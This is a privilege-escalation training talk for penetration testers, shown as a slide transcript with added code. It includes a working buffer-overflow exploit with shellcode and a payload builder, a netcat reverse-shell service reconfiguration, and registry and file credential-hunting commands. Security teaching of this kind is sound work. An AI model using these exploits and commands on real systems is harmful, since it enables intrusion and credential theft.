How Fun of Privilege Escalation (Red Pill 2017)
Organized by 2600 Thailand
  1. How Fun of Privilege Escalation. Ammarit Thongthua, CISSP, CISM, GXPN. Risk Advisory Manager, Deloitte Thailand.
  2. # whoami
     <Name> Ammarit Thongthua (Khay, Shellcodenoobx) </Name>
     <Job> Risk Advisory Manager, Deloitte Thailand; Penetration Tester; Security Consultant </Job>
     <Education> B.Eng. (Com), ABAC; M.Sc. Cyber Security and Information Assurance, Mahidol University; CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  3. Where “Privilege Escalation” sits in an engagement:
     • Pre-Exploitation: information gathering, scanning, enumeration
     • Exploitation: remote exploitation (gain system access, gain information, denial of service, privilege escalation); local exploitation (bypass restrictions, privilege escalation)
     • Post-Exploitation: gather sensitive information, manage systems/services, pivoting
  4. # “Privilege Escalation”: the privilege ladders
     • Windows: NT AUTHORITY\System > Administrators > Power Users > Users / Service Users
     • Unix: root > sudoers > users / service users
  5. # “Privilege Escalation”
     • Vertical privilege escalation -> gain a higher privilege level (e.g. user john -> root)
     • Horizontal privilege escalation -> gain access as other accounts at the same level (e.g. user john -> service users such as apache or mysql)
  6. # “Privilege Escalation” (diagram): typical Windows entry points. Anonymous FTP, a webshell or a vulnerable-service exploit lands you as a user or service account; a local exploit then climbs towards Administrators / NT AUTHORITY\System.
  7. # “Privilege Escalation” (diagram): unauthorized access as a member of Users, followed by a local exploit, reaches Administrators / NT AUTHORITY\System.
  8. # “Privilege Escalation” (diagram): same path as slide 7 (image-only slide).
  9. # Remote and Local Exploitation
     • Remote exploitation targets services listening on the network (TCP/UDP): 20/21 (FTP), 22 (SSH), 23 (Telnet), 25 (SMTP), 53/udp (DNS), 80 (HTTP), 161/udp (SNMP), 443 (HTTPS), 445 (SMB), 514 tcp/udp (rsh / syslog), 1433 (MSSQL), 1521 (Oracle), 3306 (MySQL), 3389 (RDP), and any other listening port (XXXX)
  10. # Remote and Local Exploitation: local techniques include race conditions, buffer overflows, heap overflows, kernel exploits, evasion, DLL injection, DLL hijacking, Hot Potato, and misconfigured services or file permissions
  11. # Remote and Local Exploitation (diagram: the path ends at Root)
  12. # “Privilege Escalation”: what you get once escalated
     • Access to restricted resources and files
     • System credentials: /etc/shadow, the SAM file, the registry, configuration files, encryption keys, system memory
     • Run privileged commands, change system configuration, install software
     • Pivoting
     • Maintain access, backdoors
     • Key loggers, rootkits, traffic dumps
     • Many more...
  13.–15. # “Privilege Escalation” (image-only slides)
  16. # “Privilege Escalation”: Ways for Linux
     • Remote exploit of a vulnerable service running as a high-privilege user
     • Weak password of a high-privilege user
     • Credentials stored in files with weak permissions: configuration and log files, shell history, environment variables and $PATH
     • Shell escape (restricted shell, chroot)
     • Vulnerable applications / programs / services that run as a high-privilege user
     • Weakly permissioned files of jobs/tasks run by a high-privilege user
     • Sudoers
     • System misconfiguration
     • Kernel exploitation
     • Remote exploitation of services bound to localhost
  17. Ways for Linux • Remote exploit of a vulnerable service running as a high-privilege user
  18. Ways for Linux • Remote exploit of a vulnerable service running as a high-privilege user. Find candidates by listing processes owned by root (the output shown is in ps aux format):
     FILE_SERVER# ps aux | grep root
     root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  19. Ways for Linux • Weak password of a high-privilege user: the password may be the same as or similar to the username, or a common weak one (root / Password / P@ssw0rd / ...)
  20. Ways for Linux • Credentials stored in files with weak permissions: configuration and log files, shell history, environment variables and $PATH
  21. Ways for Linux • Restricted shell escape. Ref: https://netsec.ws/?p=337
  22. Ways for Linux • Restricted shell escape. Refs: https://netsec.ws/?p=337 and https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  23. Ways for Linux • Vulnerable applications / programs / services that run as a high-privilege user. Characteristics of a useful target:
     • Owned by root (user or group)
     • Has the SUID or SGID bit set
     • Has an exploitable overflow
     • Statically linked libc (nice to have: fixed library addresses)
  24. Ways for Linux • Finding SUID/SGID binaries owned by root (the ls form needs -l, otherwise there is no permission string for grep to match; "rws" matches the SUID bit in -rwsr-xr-x):
     find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -l {} \; 2>/dev/null
     ls -lR / 2>/dev/null | grep "rws" | grep "root"
  25. Ways for Linux • Vulnerable applications / programs / services that run as a high-privilege user (image-only slide)
  26. Ways for Linux • Characteristic: the program has an exploitable overflow
  27.–28. Ways for Linux • Check the buffer overflow position, i.e. the offset at which the saved return address is overwritten (screenshots)
  29. Ways for Linux • Find a jmp esp gadget in the binary:
     # objdump -d vul_app | grep "jmp" | grep "esp"
     # ROPgadget --binary vul_app --only "jmp" | grep esp
     0x08049f0f : jmp %esp
  30. Ways for Linux • Shellcode: execve("/bin//sh") (the slide labels it system("/bin//sh"); the bytes are the classic 23-byte i386 execve shellcode, preceded by a NOP sled). The saved return address is overwritten with the jmp esp gadget at 0x08049f0f so execution lands on the sled sitting at esp:
     shellcode = "\x90"*24 + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"
  31. Ways for Linux • First attempt (return address is 0x08049f0f written little-endian):
     # python -c 'print "A"*612 + "\x0f\x9f\x04\x08" + "\x90"*24 + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
     Result: privilege is dropped. The shellcode does run with the SUID binary's effective UID, but a shell such as bash notices that the effective UID differs from the real UID and resets it unless started with -p, so the shell you land in is unprivileged.
  32. Ways for Linux • Fix: write a small helper, /tmp/sh.c (its source is an image on the slide; the usual approach is a setuid(0) followed by an exec of /bin/sh), and compile it to /tmp/sh so that the next payload spawns it instead of /bin/sh:
     # nano /tmp/sh.c
  33. Ways for Linux • Second attempt, pointing the shellcode at /tmp//sh instead of /bin//sh (only the two pushed 4-byte chunks of the path change: "/tmp" and "//sh"):
     # python -c 'print "A"*612 + "\x0f\x9f\x04\x08" + "\x90"*24 + "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x74\x6D\x70\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80"' | ./vul_app
  34. Ways for Linux (image-only slide)
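The two python -c one-liners above differ only in the path bytes pushed by the shellcode, and the return address has to be written little-endian. The builder below is an added example (not code from the deck) that assembles the same payload in Python 3 so the pieces can be checked before piping them into the binary. It assumes the values the slides show: a 612-byte offset to the saved return address, the jmp esp gadget at 0x08049f0f, and a 32-bit Linux target without canary, NX or ASLR; vul_app is the deck's demo binary and is not part of this example.

```python
"""Stack-overflow payload builder for the vul_app walk-through (added example).

Assumptions taken from the slides: 612 bytes of padding before the saved EIP,
jmp esp at 0x08049f0f, i386 Linux, no canary/NX/ASLR.
"""
import struct

JMP_ESP = 0x08049F0F      # gadget address found with objdump / ROPgadget on the slide
OFFSET = 612              # bytes written before the saved return address
NOP_SLED = b"\x90" * 24   # jmp esp lands here; the sled absorbs small esp differences


def execve_shellcode(path: bytes) -> bytes:
    """The deck's 23-byte i386 execve(path, [path], NULL) shellcode with the
    8-byte path swapped in (b"/bin//sh" on slide 30, b"/tmp//sh" on slide 33).

    The path is pushed as two 4-byte immediates, second half first, so that it
    lies in memory in the right order with the NUL from `push eax` after it.
    It must be exactly 8 bytes and contain no NUL byte; that is why the slash
    is doubled ("//sh" instead of "/sh").
    """
    if len(path) != 8 or b"\x00" in path:
        raise ValueError("path must be 8 NUL-free bytes, e.g. b'/bin//sh'")
    parts = [
        b"\x31\xc0",            # xor  eax, eax
        b"\x50",                # push eax          ; string terminator
        b"\x68" + path[4:8],    # push "//sh"       ; second half of the path
        b"\x68" + path[0:4],    # push "/bin"       ; first half of the path
        b"\x89\xe3",            # mov  ebx, esp     ; ebx = filename
        b"\x50",                # push eax          ; envp = NULL
        b"\x53",                # push ebx          ; argv[0] = filename
        b"\x89\xe1",            # mov  ecx, esp     ; ecx = argv
        b"\xb0\x0b",            # mov  al, 11       ; SYS_execve
        b"\xcd\x80",            # int  0x80
    ]
    return b"".join(parts)


def build_payload(path: bytes = b"/bin//sh", offset: int = OFFSET, ret: int = JMP_ESP) -> bytes:
    """padding | saved EIP -> jmp esp | NOP sled | shellcode (what jmp esp lands on)."""
    return b"A" * offset + struct.pack("<I", ret) + NOP_SLED + execve_shellcode(path)


def has_nul(payload: bytes) -> bool:
    """A NUL anywhere in the payload would truncate string-based input handling
    in the target, so check before sending."""
    return b"\x00" in payload


if __name__ == "__main__":
    import sys
    # Same usage as the slide:  python3 payload.py /tmp//sh | ./vul_app
    target = sys.argv[1].encode() if len(sys.argv) > 1 else b"/bin//sh"
    sys.stdout.buffer.write(build_payload(target))
```

Swapping the path for /tmp//sh reproduces slide 33; the length check makes the common mistake (a 7-byte "/bin/sh" that would leave garbage in the second push) fail loudly instead of producing a silently broken execve.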
  35. Ways for Linux • Real life is not that easy: modern binaries ship with
     • Stack canaries (buffer overflow detection)
     • Non-executable stack (NX / DEP)
     • Address Space Layout Randomization (ASLR)
  36. Ways for Linux • But each can be bypassed:
     • Canary -> canary repair (leak or brute-force the value and write it back)
     • NX / DEP -> ret2libc, ROP
     • ASLR -> statically linked libraries, application wrap-up
     Ref: https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c-82b1d063aa6b&v=&b=&from_search=1
  37. Ways for Linux • Weakly permissioned files of jobs/tasks run by a high-privilege user. Check the cron locations: /etc/cron.d, /etc/crontab, /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly
     # ls -Ral /etc/cron*
  38. Ways for Linux • If a script that root's cron runs is writable by you, append a reverse shell to it (demo on slide)
  39.–41. Ways for Linux • Weakly permissioned files of jobs/tasks run by a high-privilege user (screenshots of the demo)
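The SUID/SGID one-liners on slide 24 and the cron permission check on slides 37 to 41 are two instances of the same question: which files carry a dangerous bit or are writable by everyone, and who owns them. The scanner below is an added example (not from the deck or from LinEnum/LinuxPrivChecker) that answers both in one pass with stat() instead of parsing ls output; pointed at / it replaces the find command, pointed at /etc/cron.d it finds writable jobs. It assumes POSIX mode bits and includes a constructed fixture directory so it can be exercised without root.

```python
"""SUID/SGID and world-writable file scanner (added example, not the deck's code)."""
import os
import stat
import tempfile
from typing import Iterator, List, NamedTuple


class Finding(NamedTuple):
    path: str
    reason: str   # "suid", "sgid" or "world-writable"
    uid: int      # owner; 0 means root-owned, the interesting case for privesc
    mode: str     # symbolic mode exactly as ls -l prints it


def classify(path: str, st: os.stat_result) -> Iterator[Finding]:
    """Yield one Finding per interesting bit set on a single inode."""
    mode = st.st_mode
    sym = stat.filemode(mode)
    if stat.S_ISREG(mode) and mode & stat.S_ISUID:
        yield Finding(path, "suid", st.st_uid, sym)
    if stat.S_ISREG(mode) and mode & stat.S_ISGID:
        yield Finding(path, "sgid", st.st_uid, sym)
    # World-writable directories with the sticky bit (/tmp style) are normal;
    # a world-writable cron directory or script is not.
    sticky_dir = stat.S_ISDIR(mode) and mode & stat.S_ISVTX
    if mode & stat.S_IWOTH and not sticky_dir:
        yield Finding(path, "world-writable", st.st_uid, sym)


def scan_tree(root: str) -> List[Finding]:
    """Walk root without following symlinks; unreadable entries are skipped
    silently, like the 2>/dev/null on the slide's find command."""
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            findings.extend(classify(full, st))
    return findings


def root_owned(findings: List[Finding]) -> List[Finding]:
    """The slide's `| grep root` step: keep only root-owned hits."""
    return [f for f in findings if f.uid == 0]


def make_demo_tree() -> str:
    """Constructed fixture (not a real system): a temp directory holding a SUID
    file, an SGID file, a world-writable cron-style directory, a sticky
    /tmp-style directory and a world-writable job script."""
    base = tempfile.mkdtemp(prefix="privesc-demo-")
    for name, mode in {"suidbin": 0o4755, "sgidbin": 0o2755, "job": 0o666}.items():
        p = os.path.join(base, name)
        open(p, "w").close()
        os.chmod(p, mode)
    for name, mode in {"cron.d": 0o777, "tmp": 0o1777}.items():
        p = os.path.join(base, name)
        os.mkdir(p)
        os.chmod(p, mode)
    return base


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else make_demo_tree()
    for f in scan_tree(root):
        print(f"{f.mode} uid={f.uid:<5} {f.reason:<15} {f.path}")
```

Run it as `python3 scan.py /` for the SUID inventory or `python3 scan.py /etc` for the cron check; a root-owned, world-writable script in the output is the slide 38 case, a root-owned SUID binary is the slide 23 case.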
  42. Ways for Linux • Sudoers: the compromised user may already be in the sudoers list; check with sudo -l
  43. Ways for Linux • System misconfiguration
  44. Ways for Linux • Kernel exploitation, e.g. Dirty COW
  45. Ways for Linux • Kernel exploitation (trick), e.g. for Linux version 2.6.9-89.EL: compile the exploit on the target itself or on a system with a matching kernel and libc; Metasploitable is a convenient environment for building old exploits
  46. Ways for Linux • Remote exploitation of services bound to localhost (127.0.0.1): a root service that is unreachable from the network can still be attacked from the box once you have a foothold
     # ps aux | grep root
     root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  47. Ways for Linux • Linux privilege escalation scripts and commands. Ref: https://netsec.ws/?p=309
     • LinEnum: http://www.rebootuser.com/?p=1758
     • LinuxPrivChecker: http://www.securitysift.com/download/linuxprivchecker.py
     • Basic Linux privilege escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  48.–49. Ways for Linux • LinuxPrivChecker (screenshots)
  50.–54. Ways for Linux • Case study (screenshots; slide 52: but no exploit details in exploit-db!)
  55. Ways for Linux • Case study (diagram; nodes: Low Priv, Bypass Restrict Shell, Dirty Cow, root, Default password, Crack root pass, Other Unix Servers, CMC)
  56. # “Privilege Escalation”: Ways for Windows
     • Remote exploit of a vulnerable service running as a high-privilege user
     • Weak password of a high-privilege user
     • Credentials stored in files and the registry
     • Vulnerable applications / programs / services that run as a high-privilege user
     • Weakly permissioned files of jobs/tasks run by a high-privilege user
     • System misconfiguration
     • Kernel exploitation
     • Pass-the-Hash
     • DLL injection
     • DLL hijacking
     • Remote exploitation of services bound to localhost
     • Hot Potato
     • Many more...
  57. # Remote exploit to escalate privilege • Exploit a vulnerable service running as a high-privilege user
  58. # Remote exploit to escalate privilege • Exploit a vulnerable service running as a high-privilege user. Credit: Worawit Wangwarunyoo (sleepya)
  59.–60. Ways for Windows • Exploit a misconfigured service running as a high-privilege user (screenshots)
  61. # Remote exploit to escalate privilege • Exploit a misconfigured service running as a high-privilege user: webshell
  62. Ways for Windows • Reverse Meterpreter: the getsystem command
  63. Ways for Windows • Reverse Meterpreter: the getsystem command. “It’s not always easy in real life”
  64.–66. Ways for Windows • Process migration (screenshots)
  67. # Remote exploit to escalate privilege • Credentials stored in files:
     findstr /si password *.txt
     findstr /si password *.xml
     findstr /si password *.ini
     (also try pass, pwd and similar strings; /i already makes the match case-insensitive)
  68. # Remote exploit to escalate privilege • Credentials stored in files: unattended-install answer files and VNC configuration files
     c:\sysprep.inf
     c:\sysprep\sysprep.xml
     c:\unattend.xml
     %WINDIR%\Panther\Unattend\Unattended.xml
     %WINDIR%\Panther\Unattended.xml
     dir c:\*vnc.ini /s /b
     dir c:\*ultravnc.ini /s /b
     dir c:\ /s /b | findstr /si *vnc.ini
  69. # Remote exploit to escalate privilege • Credentials stored in Group Policy script and preference files on the DC (\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies). Ref: https://adsecurity.org/?p=2288
  70. # Remote exploit to escalate privilege • Credentials stored in the registry:
     # VNC
     reg query "HKCU\Software\ORL\WinVNC3\Password"
     # Windows autologon
     reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
     # SNMP parameters (community strings)
     reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
     # PuTTY saved sessions
     reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
     # Search the registry for the word password
     reg query HKLM /f password /t REG_SZ /s
     reg query HKCU /f password /t REG_SZ /s
  71.–72. # Remote exploit to escalate privilege • Credentials stored in the registry (screenshots)
  73. # Remote exploit to escalate privilege • Dumping plaintext passwords on Windows Server 2012. Ref: http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
  74. # Remote exploit to escalate privilege (screenshot)
  75. # Remote exploit to escalate privilege • Token impersonation. Ref: https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  76. Ways for Windows • Insecure service permissions
  77. Ways for Windows • Insecure service permissions -> modify binpath. Find services a low-privilege user may reconfigure with accesschk: https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  78. Ways for Windows • Insecure service permissions -> modify binpath. Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  79. Ways for Windows • Insecure service permissions -> modify binpath (example, screenshot)
  80. Ways for Windows • Insecure service permissions -> modify binpath (example). Point the service binary at a netcat reverse shell, then restart the service; note that sc requires the space after binpath=:
     sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.110 5555 -e C:\WINDOWS\System32\cmd.exe"
  81. Ways for Windows • Insecure service permissions found with Metasploit (screenshot)
  82. Ways for Windows (image-only slide)
  83. Ways for Windows • Unquoted service paths. When Windows starts a service whose ImagePath contains spaces and is not quoted, it tries the path at each space boundary in order and runs the first executable it finds (the list of probed paths is shown on the slide). Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  84.–86. Ways for Windows • Unquoted service paths (screenshots)
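The probe order above is what makes the bug exploitable: a writable directory anywhere before the real binary is a drop location. The audit below is an added example (not from the deck or from pentest.blog) that reproduces the CreateProcess rule for a service path and reports the hijackable probe paths. The service table and the set of writable directories are constructed for the example; on a real host the paths come from `sc qc <service>` or `wmic service get name,pathname` and the writable set from accesschk or icacls, as slide 77 suggests.

```python
"""Unquoted service path audit (added example, not the deck's code).

Models how CreateProcess resolves an unquoted ImagePath: it takes the text up to
each space in turn, appends .exe when that fragment has no extension, and runs
the first file that exists. The service table and writable set are constructed.
"""
import ntpath
from typing import Dict, List, Set


def candidates(image_path: str) -> List[str]:
    """Executables Windows would try, in order, for a service ImagePath.

    A quoted path is unambiguous. For an unquoted one the probing stops at the
    first fragment that names an .exe; anything after it is treated as arguments.
    """
    if image_path.startswith('"'):
        return [image_path.split('"')[1]]
    tokens = image_path.split(" ")
    probes = []
    for i in range(1, len(tokens) + 1):
        fragment = " ".join(tokens[:i])
        _, ext = ntpath.splitext(fragment)
        probes.append(fragment if ext else fragment + ".exe")
        if fragment.lower().endswith(".exe"):
            break
    return probes


def _norm(p: str) -> str:
    return ntpath.normpath(p).lower()   # Windows paths are case-insensitive


def hijack_points(image_path: str, writable_dirs: Set[str]) -> List[str]:
    """Probe paths (excluding the real binary) whose directory a low-privilege
    user can write to. An EXE planted there is started by the service, as the
    service account, on the next restart or reboot."""
    writable = {_norm(d) for d in writable_dirs}
    probes = candidates(image_path)
    return [p for p in probes[:-1] if _norm(ntpath.dirname(p)) in writable]


def audit(services: Dict[str, str], writable_dirs: Set[str]) -> Dict[str, List[str]]:
    """Services with an unquoted, space-containing path -> usable drop locations
    (an empty list means unquoted but no writable probe directory)."""
    return {
        name: hijack_points(path, writable_dirs)
        for name, path in services.items()
        if len(candidates(path)) > 1
    }


# Constructed sample data (not from any real host).
SERVICES = {
    "GoodSvc": '"C:\\Program Files\\Good Vendor\\good.exe" -k',
    "Svchost": 'C:\\WINDOWS\\System32\\svchost.exe -k LocalService',
    "VulnSvc": 'C:\\Program Files\\Some Vendor\\svc host\\svc.exe',
    "VendorAgent": 'C:\\Vendor Tools\\agent.exe -service',
}
WRITABLE = {"C:\\Program Files\\Some Vendor"}   # e.g. a vendor install with a weak ACL

if __name__ == "__main__":
    for name, drops in audit(SERVICES, WRITABLE).items():
        print(f"{name}: unquoted path; drop EXE at {drops or 'no writable probe dir'}")
```

The output for the sample is one exploitable service (VulnSvc, plant `C:\Program Files\Some Vendor\svc.exe`) and one that is merely unquoted (VendorAgent), which is the distinction the screenshots on slides 84 to 86 are making.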
  87.–88. Ways for Windows (image-only slides)
  89.–91. Ways for Windows • Unquoted path + MS15-067 (screenshots; slide 91: GGEZ)
  92. Ways for Windows • DLL hijacking. Windows loads a DLL by searching these directories in this order (the SafeDllSearchMode order, the default):
     – the directory from which the application loaded
     – C:\Windows\System32
     – C:\Windows\System
     – C:\Windows
     – the current working directory
     – directories in the system PATH environment variable
     – directories in the user PATH environment variable
     Refs: https://msitpros.com/?p=2012 and https://www.gracefulsecurity.com/privesc-dll-hijacking/
  93.–96. Ways for Windows • DLL hijacking (screenshots). Ref: https://pentestlab.blog/2017/03/27/dll-hijacking/
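The search order on slide 92 turns DLL hijacking into a simple question: is there a directory the low-privilege user can write to that the loader visits before the one holding the legitimate DLL (or before giving up, when the DLL is not installed at all)? The resolver below is an added example (not from the deck or the linked posts) that encodes that order and answers the question for a constructed process: application directory, current directory, PATH entries, existing files and writable directories are all made up for the example. KnownDLLs and modules already loaded in the process are resolved before any directory search and are not modelled.

```python
"""DLL search-order resolver for hijack hunting (added example, not the deck's code)."""
import ntpath
from typing import List, Optional, Set

WINDIR = "C:\\Windows"


def search_order(app_dir: str, cwd: str, system_path: List[str], user_path: List[str]) -> List[str]:
    """The directory order from slide 92 (SafeDllSearchMode enabled)."""
    return [
        app_dir,
        ntpath.join(WINDIR, "System32"),
        ntpath.join(WINDIR, "System"),
        WINDIR,
        cwd,
    ] + list(system_path) + list(user_path)


def _norm(p: str) -> str:
    # Windows paths are case-insensitive; normpath also drops trailing backslashes.
    return ntpath.normpath(p).lower()


def resolve(dll: str, order: List[str], existing: Set[str]) -> Optional[str]:
    """Full path of the copy of `dll` the loader would pick, or None if none exists."""
    have = {_norm(p) for p in existing}
    for d in order:
        cand = ntpath.join(d, dll)
        if _norm(cand) in have:
            return cand
    return None


def hijackable(dll: str, order: List[str], existing: Set[str], writable: Set[str]) -> List[str]:
    """Writable directories searched before the legitimate copy of `dll`
    (every writable directory in the order if the DLL is missing everywhere).
    A DLL planted there is loaded by the process with the process's privileges."""
    legit = resolve(dll, order, existing)
    legit_dir = _norm(ntpath.dirname(legit)) if legit else None
    writable_n = {_norm(d) for d in writable}
    hits = []
    for d in order:
        if legit_dir is not None and _norm(d) == legit_dir:
            break                       # the real DLL wins from here on
        if _norm(d) in writable_n:
            hits.append(d)
    return hits


# Constructed scenario (not a real host).
APP_DIR = "C:\\Program Files\\Vendor"
CWD = "C:\\Users\\low\\Desktop"
SYSTEM_PATH = ["C:\\Windows\\System32", "C:\\Windows"]
USER_PATH = ["C:\\Tools"]
EXISTING = {"C:\\Program Files\\Vendor\\helper.dll", "C:\\Windows\\System32\\version.dll"}
WRITABLE = {CWD, "C:\\Tools"}            # what a low-privilege user can write to
ORDER = search_order(APP_DIR, CWD, SYSTEM_PATH, USER_PATH)

if __name__ == "__main__":
    for dll in ("helper.dll", "version.dll", "missing.dll"):
        print(dll, "->", resolve(dll, ORDER, EXISTING), "hijack via", hijackable(dll, ORDER, EXISTING, WRITABLE))
```

Two results matter in practice: a DLL the application probes but that is not installed anywhere (missing.dll here) is hijackable from the current directory or any writable PATH entry, and a system DLL such as version.dll becomes hijackable as soon as the application's own directory is writable, which is the misconfigured-installer case the pentestlab screenshots show.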
  97. Ways for Windows • Driver exploitation
  98. Ways for Windows • Driver exploitation, example: Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation, https://www.exploit-db.com/exploits/42665/
  99. Ways for Windows • Hot Potato
  100. Ways for Windows • Hot Potato: adding a user manually versus with the Hot Potato technique (screenshots)
  101. Ways for Windows • Pass-the-Hash
  102. Ways for Windows • Remote exploit on the localhost
  103.–104. Ways for Windows • Local exploit with Metasploit (screenshots)
  105.–108. Ways for Windows • Local exploit to escalate privilege (screenshots)
  109. Ways for Windows • Building Windows exploit executables from a Linux box (32-bit wine plus PyInstaller):
     dpkg --add-architecture i386 && apt-get update && apt-get install wine32
     pip install pyinstaller
  110. Ways for Windows • DEMO: Noobx_shell
  111.–112. Ways for Windows (image-only slides)
  113. Ways for Windows • Case study 2: MS17-010 (diagram: DC1, servers, unpatched client PC)
  114.–115. Ways for Windows • Case study 2: MS17-010 (screenshots)
  116. Ways for Windows • Case study 2: MS17-010 (diagram: DC1, servers, unpatched client PC)
  117. # “Privilege Escalation” on other devices
     • Mobile phones: root or jailbreak; Dirty COW
     • Network devices: remote exploits (e.g. EXTRABACON), backdooring (e.g. ROM-0), password cracking of high-privilege accounts
  118. # “Privilege Escalation” on other devices (image-only slide)
  119. # Prevention
     • Secure by design
     • System hardening: disable unused services; disable or remove unused programs, users and backup files; install endpoint security
     • Strong access control and authentication
     • Least privilege
     • Patch management
     • Security assessment: vulnerability assessment, penetration testing
  120. Q & A
  121. Thank You. Ammarit Thongthua, CISSP, CISM, GXPN. Risk Advisory Manager, Deloitte Thailand
  122. # References
     • http://www.fuzzysecurity.com/tutorials/16.html
     • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
     • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md
     • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/
     • https://pentestlab.blog/2017/04/04/dll-injection